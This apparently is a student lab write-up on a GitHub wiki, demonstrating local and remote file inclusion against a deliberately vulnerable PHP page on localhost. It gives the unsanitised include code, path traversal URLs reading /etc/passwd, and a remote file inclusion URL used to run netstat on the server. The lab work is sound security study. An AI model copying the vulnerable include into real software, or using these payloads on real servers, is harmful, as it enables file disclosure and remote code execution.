Lab 2.2 File Inclusion Vulnerabilities - Zacham17/my-tech-journal GitHub Wiki
- I created an index.php file to create a simple page to create a testing environment. My index.php file used the following code:
<a href="index.php?page=page1.html"><button>page1</button></a><br/>
<a href="index.php?page=page2.html"><button>page2</button></a><br/>
<a href="index.php?page=page3.html"><button>page3</button></a><br/>
<?php
$page = $_GET['page'];
echo "<div>";
if(isset($page))
{
include("$page");
}
else
{
echo "<p>select a page</p>";
}
echo "</div";
?>
- I also created three simple html files containing arbitrary code, called page1.html, page2.html, and page3.html
- It is important to note that all of the files, including index.php, are in the same directory
- Using the
php -Scommand can be used to create an adhoc-web server that can interpret PHP code.
- Using the command
php -S 127.0.0.1:9000opens connections to the local address on port 9000.
- Browsing to 127.0.0.1:9000/index.php in a browser will open the webpage for the index.php file. There are also buttons to navigate to page 1, page 2, and page 3, all which navigate to their associated html file.
When a button is clicked to navigate to page 1, 2, or 3, the URL changes to reflect this. An example of the URL when on page 1 is shown in the screenshot below.
There is a vulnerability here where the URL can be manipulated to show the contents of files that the user is not meant to see from the web page. For example, the url 127.0.0.1:9000/index.php?page=../../../etc/passwd can be used to show the contents of the /etc/passwd file. The image below shows what the URL looks like in the URL bar.
That is the Local File Inclusion vulnerability. In that example, someone could get information that they are not supposed to see. Another example is with the url 127.0.0.1:9000/index.php?page=../../../etc/os-release. That URL will show the contents of the os-release file, which includes information about the operating system of the device hosting the web server.
I took the following steps to set up an environment to test remote file inclusion:
- Create an html file called rfi.html, containing arbitrary code.
- Copy the php.ini file into the directory containing all my other file inclusion filed
-
Note: On my system, I had to copy php.ini from /etc/php/8.1/cli/php.ini
-
- Set the "allow_url_include" flag to "On" in the php.ini file
- Restart the adhoc web-server using the command
php -S 127.0.0.7:9000 -c php.ini
- To simulate a remote system, I used the command
python -m http.server 8000to start another http server on port 8000. - To include the rfi.html file, I entered the following url:
127.0.0.1:9000/index.php?page=http://127.0.0.1:8000/rfi.html- The screenshot below shows the rfi.html file being included:
- The screenshot below shows the rfi.html file being included:
- Now we know that files can remotely be shown through remote file inclusion. If the file that is remotely called upon, contains php code, that code will execute. This could allow an attacker to perform remote code execution on the system. For example, I was able to run the netstat command on the target web server by performing remote file inclusion of an rfi.php file that I made that contained the code shown in the screenshot below:
- The code shown above executes the netstat command
- Using the url,
127.0.0.1:9000/index.php?page=http://127.0.0.1:8000/rfi.php, I was able to call the file, which ran the command on the target web server. The result is shown below:
Local File Inclusion and Remote File Inclusion can both be very dangerous vulnerabilities that could lead to further exploitation of systems. This document provided one demonstration of each local file inclusion and remote file inclusion.